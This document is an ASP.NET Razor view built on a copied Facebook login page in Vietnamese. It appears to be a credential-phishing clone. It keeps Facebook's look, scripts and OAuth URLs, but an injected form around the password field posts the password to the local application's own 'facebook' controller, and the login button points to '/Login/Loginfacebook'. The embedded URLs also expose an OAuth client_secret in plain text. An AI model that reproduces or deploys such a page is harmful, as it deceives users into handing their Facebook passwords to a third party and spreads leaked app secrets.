<!DOCTYPE html>
<html lang="vi" id="facebook" class="tinyViewport tinyWidth">
<head>
    <meta charset="utf-8">
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
    <script nonce="GnP30QzQ">window._cstart=+new Date();</script>
    <script nonce="GnP30QzQ">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjd5cFlW2Qu3f3J","timeslice_heartbeat_config":{"pollIntervalMs":33,"idleGapThresholdMs":60,"ignoredTimesliceNames":{"requestAnimationFrame":true,"Event listenHandler mousemove":true,"Event listenHandler mouseover":true,"Event listenHandler mouseout":true,"Event listenHandler scroll":true},"isHeartbeatEnabled":true,"isArtilleryOn":false},"shouldLogCounters":true,"timeslice_categories":{"react_render":true,"reflow":true},"sample_continuation_stacktraces":true,"dom_mutation_flag":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4fJmRt17iUjyUk","isCQuick":false});</script>
    <style nonce="GnP30QzQ"></style>
    <script nonce="GnP30QzQ">__DEV__=0;CavalryLogger=window.CavalryLogger||function(a){this.lid=a,this.transition=!1,this.metric_collected=!1,this.is_detailed_profiler=!1,this.instrumentation_started=!1,this.pagelet_metrics={},this.events={},this.ongoing_watch={},this.values={t_cstart:window._cstart},this.piggy_values={},this.bootloader_metrics={},this.resource_to_pagelet_mapping={},this.initializeInstrumentation&&this.initializeInstrumentation()},CavalryLogger.prototype.setIsDetailedProfiler=function(a){this.is_detailed_profiler=a;return this},CavalryLogger.prototype.setTTIEvent=function(a){this.tti_event=a;return this},CavalryLogger.prototype.setValue=function(a,b,c,d){d=d?this.piggy_values:this.values;(typeof d[a]==="undefined"||c)&&(d[a]=b);return this},CavalryLogger.prototype.getLastTtiValue=function(){return this.lastTtiValue},CavalryLogger.prototype.setTimeStamp=CavalryLogger.prototype.setTimeStamp||function(a,b,c,d){this.mark(a);var e=this.values.t_cstart||this.values.t_start;e=d?e+d:CavalryLogger.now();this.setValue(a,e,b,c);this.tti_event&&a==this.tti_event&&(this.lastTtiValue=e,this.setTimeStamp("t_tti",b));return this},CavalryLogger.prototype.mark=typeof console==="object"&&console.timeStamp?function(a){console.timeStamp(a)}:function(){},CavalryLogger.prototype.addPiggyback=function(a,b){this.piggy_values[a]=b;return this},CavalryLogger.instances={},CavalryLogger.id=0,CavalryLogger.getInstance=function(a){typeof a==="undefined"&&(a=CavalryLogger.id);CavalryLogger.instances[a]||(CavalryLogger.instances[a]=new CavalryLogger(a));return CavalryLogger.instances[a]},CavalryLogger.setPageID=function(a){if(CavalryLogger.id===0){var b=CavalryLogger.getInstance();CavalryLogger.instances[a]=b;CavalryLogger.instances[a].lid=a;delete CavalryLogger.instances[0]}CavalryLogger.id=a},CavalryLogger.now=function(){return window.performance&&performance.timing&&performance.timing.navigationStart&&performance.now?performance.now()+performance.timing.navigationStart:new Date().getTime()},CavalryLogger.prototype.measureResources=function(){},CavalryLogger.prototype.profileEarlyResources=function(){},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){},CavalryLogger.start_js=function(){},CavalryLogger.done_js=function(){};CavalryLogger.getInstance().setTTIEvent("t_domcontent");CavalryLogger.prototype.measureResources=function(a,b){if(!this.log_resources)return;var c="bootload/"+a.name;if(this.bootloader_metrics[c]!==void 0||this.ongoing_watch[c]!==void 0)return;var d=CavalryLogger.now();this.ongoing_watch[c]=d;"start_"+c in this.bootloader_metrics||(this.bootloader_metrics["start_"+c]=d);b&&!("tag_"+c in this.bootloader_metrics)&&(this.bootloader_metrics["tag_"+c]=b);if(a.type==="js"){c="js_exec/"+a.name;this.ongoing_watch[c]=d}},CavalryLogger.prototype.stopWatch=function(a){if(this.ongoing_watch[a]){var b=CavalryLogger.now(),c=b-this.ongoing_watch[a];this.bootloader_metrics[a]=c;var d=this.piggy_values;a.indexOf("bootload")===0&&(d.t_resource_download||(d.t_resource_download=0),d.resources_downloaded||(d.resources_downloaded=0),d.t_resource_download+=c,d.resources_downloaded+=1,d["tag_"+a]=="_EF_"&&(d.t_pagelet_cssload_early_resources=b));delete this.ongoing_watch[a]}return this},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){var a={};Object.values(window.CavalryLogger.instances).forEach(function(b){b.bootloader_metrics&&Object.assign(a,b.bootloader_metrics)});return a},CavalryLogger.start_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("js_exec/"+a[b])},CavalryLogger.done_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("bootload/"+a[b])},CavalryLogger.prototype.profileEarlyResources=function(a){for(var b=0;b<a.length;b++)this.measureResources({name:a[b][0],type:a[b][1]?"js":""},"_EF_")};CavalryLogger.getInstance().log_resources=true;CavalryLogger.getInstance().setIsDetailedProfiler(true);window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp("t_start");</script>
    <noscript><meta http-equiv="refresh" content="0; URL=/login.php?skip_api_login=1&amp;api_key=1096970804101325&amp;kid_directed_site=0&amp;app_id=1096970804101325&amp;signed_next=1&amp;next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D1096970804101325%26client_secret%3Df00cf2d543136b46f90d72c7168ad592%26redirect_uri%3Dhttp%253A%252F%252Flocalhost%253A50543%252FLogin%252FFacebookCallback%26response_type%3Dcode%26scope%3Demail%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D2a306f5b-43f1-46e1-a550-c339a771465e&amp;cancel_url=http%3A%2F%2Flocalhost%3A50543%2FLogin%2FFacebookCallback%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%23_%3D_&amp;display=page&amp;locale=vi_VN&amp;pl_dbl=0&amp;_fb_noscript=1" /></noscript>
    <link rel="manifest" href="/data/manifest/" crossorigin="use-credentials">
    <title id="pageTitle">Đăng nhập Facebook | Facebook</title>
  
    <link rel="canonical" href="https://vi-vn.facebook.com/login/">
    <link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/login/?locale2=vi_VN">
    <link rel="alternate" media="handheld" href="https://m.facebook.com/login/?locale2=vi_VN">
    <link rel="alternate" hreflang="x-default" href="https://www.facebook.com/login/">
    <link rel="alternate" hreflang="en" href="https://www.facebook.com/login/">
    <link rel="alternate" hreflang="ar" href="https://ar-ar.facebook.com/login/">
    <link rel="alternate" hreflang="bg" href="https://bg-bg.facebook.com/login/">
    <link rel="alternate" hreflang="bs" href="https://bs-ba.facebook.com/login/">
    <link rel="alternate" hreflang="ca" href="https://ca-es.facebook.com/login/">
    <link rel="alternate" hreflang="da" href="https://da-dk.facebook.com/login/">
    <link rel="alternate" hreflang="el" href="https://el-gr.facebook.com/login/">
    <link rel="alternate" hreflang="es" href="https://es-la.facebook.com/login/">
    <link rel="alternate" hreflang="es-es" href="https://es-es.facebook.com/login/">
    <link rel="alternate" hreflang="fa" href="https://fa-ir.facebook.com/login/">
    <link rel="alternate" hreflang="fi" href="https://fi-fi.facebook.com/login/">
    <link rel="alternate" hreflang="fr" href="https://fr-fr.facebook.com/login/">
    <link rel="alternate" hreflang="fr-ca" href="https://fr-ca.facebook.com/login/">
    <link rel="alternate" hreflang="hi" href="https://hi-in.facebook.com/login/">
    <link rel="alternate" hreflang="hr" href="https://hr-hr.facebook.com/login/">
    <link rel="alternate" hreflang="id" href="https://id-id.facebook.com/login/">
    <link rel="alternate" hreflang="it" href="https://it-it.facebook.com/login/">
    <link rel="alternate" hreflang="ko" href="https://ko-kr.facebook.com/login/">
    <link rel="alternate" hreflang="mk" href="https://mk-mk.facebook.com/login/">
    <link rel="alternate" hreflang="ms" href="https://ms-my.facebook.com/login/">
    <link rel="alternate" hreflang="pl" href="https://pl-pl.facebook.com/login/">
    <link rel="alternate" hreflang="pt" href="https://pt-br.facebook.com/login/">
    <link rel="alternate" hreflang="pt-pt" href="https://pt-pt.facebook.com/login/">
    <link rel="alternate" hreflang="ro" href="https://ro-ro.facebook.com/login/">
    <link rel="alternate" hreflang="sl" href="https://sl-si.facebook.com/login/">
    <link rel="alternate" hreflang="sr" href="https://sr-rs.facebook.com/login/">
    <link rel="alternate" hreflang="th" href="https://th-th.facebook.com/login/">
    <link rel="alternate" hreflang="vi" href="https://vi-vn.facebook.com/login/">
    <meta name="description" content="Hãy đăng nhập Facebook để bắt đầu chia sẻ và kết nối với bạn bè, gia đình và những người bạn biết.">
    <meta name="robots" content="noodp,noydir">
    <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yz/r/KFyVIAWzntM.ico">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y4/l/0,cross/UbwvNQ0rbtD.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="H97r7">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/ZW1sjKghbgr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="jiDVi">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/YnB2WDrYeHX.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Kpdhp">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/lD26AcPrNwu.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="QziNx">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yC/l/0,cross/S2oi93W1nJ6.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="psgmq">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/ruhflqTo7vk.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="b7uPV" nonce="GnP30QzQ"></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3iEVu4/yK/l/vi_VN/L70m7APBdn5.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3iEVu4/yK/l/vi_VN/L70m7APBdn5.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="data:text/css; charset=utf-8;base64,I2Jvb3Rsb2FkZXJfUF9tcjV7aGVpZ2h0OjQycHg7fS5ib290bG9hZGVyX1BfbXI1e2Rpc3BsYXk6YmxvY2shaW1wb3J0YW50O30=" rel="preload" as="style">
    <link rel="stylesheet" type="text/css" href="data:text/css; charset=utf-8;base64,I2Jvb3Rsb2FkZXJfUF9tcjV7aGVpZ2h0OjQycHg7fS5ib290bG9hZGVyX1BfbXI1e2Rpc3BsYXk6YmxvY2shaW1wb3J0YW50O30=">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3i7dH4/yr/l/vi_VN/VfuGskvjlCA.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3i7dH4/yr/l/vi_VN/VfuGskvjlCA.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/L-VwcQzLcQs.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/L-VwcQzLcQs.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/jon0WJCUJ7B.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/jon0WJCUJ7B.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3iYgh4/yY/l/vi_VN/LEeLZdfPMH5.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3iYgh4/yY/l/vi_VN/LEeLZdfPMH5.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3iR_y4/yF/l/vi_VN/p1Y_ErFnZ75.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3iR_y4/yF/l/vi_VN/p1Y_ErFnZ75.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3ikoB4/yS/l/vi_VN/OH1tZgTxIqD.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3ikoB4/yS/l/vi_VN/OH1tZgTxIqD.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3in2w4/ys/l/vi_VN/ECtXL8CC9Se.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3in2w4/ys/l/vi_VN/ECtXL8CC9Se.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3i4T54/yG/l/vi_VN/M9vEQ77paM3.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3i4T54/yG/l/vi_VN/M9vEQ77paM3.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3iPvd4/yF/l/vi_VN/X1myIzIdt-H.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3iPvd4/yF/l/vi_VN/X1myIzIdt-H.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/k3tf_M5FVcQ.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/k3tf_M5FVcQ.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/8d8ckcXzPSX.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/y3/r/8d8ckcXzPSX.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/L4SnSWq9Re0.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/L4SnSWq9Re0.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3iB2T4/yl/l/vi_VN/LckLAcH-2vm.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <script src="https://static.xx.fbcdn.net/rsrc.php/v3iB2T4/yl/l/vi_VN/LckLAcH-2vm.js?_nc_x=Ij3Wp8lg5Kz" async=""></script>
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/y6/r/-L9IhvFQoWO.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/7oVtGLsr9D2.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
     <link href="https://static.xx.fbcdn.net/rsrc.php/v3iMn54/yb/l/vi_VN/45aOfO-J-98.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
   
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/cDKZHpDWcVs.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script">
</head>
<body class="login_page _39il UIPage_LoggedOut _-kb _605a b_c3pyn-ahh webkit win x2 Locale_vi_VN cores-gte4 _19_u hasAXNavMenubar" dir="ltr">
    <script nonce="GnP30QzQ">requireLazy(["bootstrapWebSession"],function(j){j(1600052448)})</script><div class="_li" id="u_0_2"><div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_3"><div class="_608m"><div class="_5aj7 _tb6"><div class="_4bl7"><span class="mrm _3bcv _50f3">Chuyển tới</span></div><div class="_4bl9 _3bcp"><div class="_6a _608n" aria-label="Trợ lý điều hướng" aria-keyshortcuts="Alt+/" role="menubar" id="u_0_4"><div class="_6a uiPopover" id="u_0_5"><a role="menuitem" class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="#" style="max-width:200px;" aria-haspopup="true" aria-expanded="false" rel="toggle" id="u_0_6"><span class="_55pe">Các phần của trang này</span><span class="_4o_3 _3-99"><i class="img sp_uP16EDN4sAD_2x sx_2997cb"></i></span></a></div><div class="_6a _3bcs"></div><div class="_6a mrm uiPopover" id="u_0_7"><a role="menuitem" class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy" href="#" style="max-width:200px;" aria-haspopup="true" tabindex="-1" aria-expanded="false" rel="toggle" id="u_0_8"><span class="_55pe">Trợ giúp về trợ năng</span><span class="_4o_3 _3-99"><i class="img sp_uP16EDN4sAD_2x sx_76ef5d"></i></span></a></div></div></div><div class="_4bl7 mlm pll _3bct"><div class="_6a _3bcy">Nhấn <span class="_3bcz">alt</span> + <span class="_3bcz">/</span> để mở menu này</div></div></div></div></div><div id="pagelet_bluebar" data-referrer="pagelet_bluebar"><div id="blueBarDOMInspector"><div class="_53jh"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><div class="lfloat _ohe"><h1><a href="https://www.facebook.com/" title="Vào Trang chủ Facebook"><i class="fb_logo img sp_jaC-7FVo1s3_2x sx_5e93b7"><u>Facebook</u></i></a></h1></div></div></div><div class="signupBanner"><div class="signup_bar_container"><div class="signup_box clearfix"><span class="signup_box_content"><a role="button" class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="/r.php?locale=vi_VN">Tạo tài khoản mới</a></span></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div class="fb_content clearfix " id="content" role="main"><div class="_4-u5 _30ny"><span class="muffin_tracking_pixel_start"></span><img class="tracking_pixel"><span class="muffin_tracking_pixel_end"></span><div class="_4-u2 _1w1t _4-u8 _52jv"><div class="_xku" id="header_block"><span class="_97w1 _50f6"><div class="_9axz">Đăng nhập Facebook</div></span></div><div><div class="login_form_container"><form id="login_form" action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&amp;next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D1096970804101325%26client_secret%3Df00cf2d543136b46f90d72c7168ad592%26redirect_uri%3Dhttp%253A%252F%252Flocalhost%253A50543%252FLogin%252FFacebookCallback%26response_type%3Dcode%26scope%3Demail%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D2a306f5b-43f1-46e1-a550-c339a771465e%26cbt%3D1600052461303&amp;lwv=101" method="post" onsubmit=""><input type="hidden" name="jazoest" value="2686" autocomplete="off"><input type="hidden" name="lsd" value="AVr38jgi" autocomplete="off"><input type="hidden" autocomplete="off" id="error_box"><div id="loginform"><input type="hidden" autocomplete="off" id="api_key" name="api_key" value="1096970804101325"><input type="hidden" autocomplete="off" id="cancel_url" name="cancel_url" value="http://localhost:50543/Login/FacebookCallback?error=access_denied&amp;error_code=200&amp;error_description=Permissions+error&amp;error_reason=user_denied#_=_"><input type="hidden" autocomplete="off" id="display" name="display" value="page"><input type="hidden" autocomplete="off" id="enable_profile_selector" name="enable_profile_selector" value=""><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value=""><input type="hidden" autocomplete="off" id="legacy_return" name="legacy_return" value="0"><input type="hidden" autocomplete="off" id="profile_selector_ids" name="profile_selector_ids" value=""><input type="hidden" autocomplete="off" id="return_session" name="return_session" value=""><input type="hidden" autocomplete="off" id="skip_api_login" name="skip_api_login" value="1"><input type="hidden" autocomplete="off" id="signed_next" name="signed_next" value="1"><input type="hidden" autocomplete="off" id="trynum" name="trynum" value="1"><input type="hidden" autocomplete="off" name="timezone" value="-420" id="u_0_9"><input type="hidden" autocomplete="off" name="lgndim" value="eyJ3IjoxMjgwLCJoIjo4MDAsImF3IjoxMjgwLCJhaCI6NzYwLCJjIjoyNH0=" id="u_0_a"><input type="hidden" name="lgnrnd" value="200048_nodQ"><input type="hidden" id="lgnjs" name="lgnjs" value="1600052461"><div class="clearfix _5466 _44mg" id="email_container"><input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email" id="email" tabindex="0" placeholder="Email hoặc số điện thoại" style="height:36px" value="" autocomplete="username" aria-label="Email hoặc số điện thoại"></div>


    
    @using (Html.BeginForm("facebook", "facebook", FormMethod.Post))
    {
        <div class="clearfix _5466 _44mg">
            <input type="password" style="height:36px" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="pass" id="pass" tabindex="0" placeholder="Mật khẩu" autofocus="1" value="" autocomplete="current-password" aria-label="Mật khẩu">
        </div>

    <div class="_xkt"><a href="/Login/Loginfacebook" value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" >Đăng nhập</a></div>

    <div id="login_link"><div class="_97w3"><a href="https://www.facebook.com/recover/initiate/?ars=facebook_login" class="_97w4" target="">Quên tài khoản?</a></div><div class="_1rf5"><span class="_1rf8">hoặc</span></div><div class="_xkt"><a role="button" class="_42ft _4jy0 _16jx _4jy6 _4jy2 selected _51sy" href="/r.php?api_key=1096970804101325&amp;app_id=1096970804101325&amp;cancel_url=http%3A%2F%2Flocalhost%3A50543%2FLogin%2FFacebookCallback%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%23_%3D_&amp;next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D1096970804101325%26client_secret%3Df00cf2d543136b46f90d72c7168ad592%26redirect_uri%3Dhttp%253A%252F%252Flocalhost%253A50543%252FLogin%252FFacebookCallback%26response_type%3Dcode%26scope%3Demail%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D2a306f5b-43f1-46e1-a550-c339a771465e&amp;locale=vi_VN&amp;display=page">Tạo tài khoản mới</a></div></div>
    <input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value=""/>
    <input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" value="last_login"/>
    <input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" value="contact_point"/>
    <input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" value="last_login"/>
    <input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" value="contact_point"/>
    <input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="true"/>
    <input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false"/>
    <input type="hidden" autocomplete="off" name="ab_test_data" value="">
        }
    
    </body>
</html>
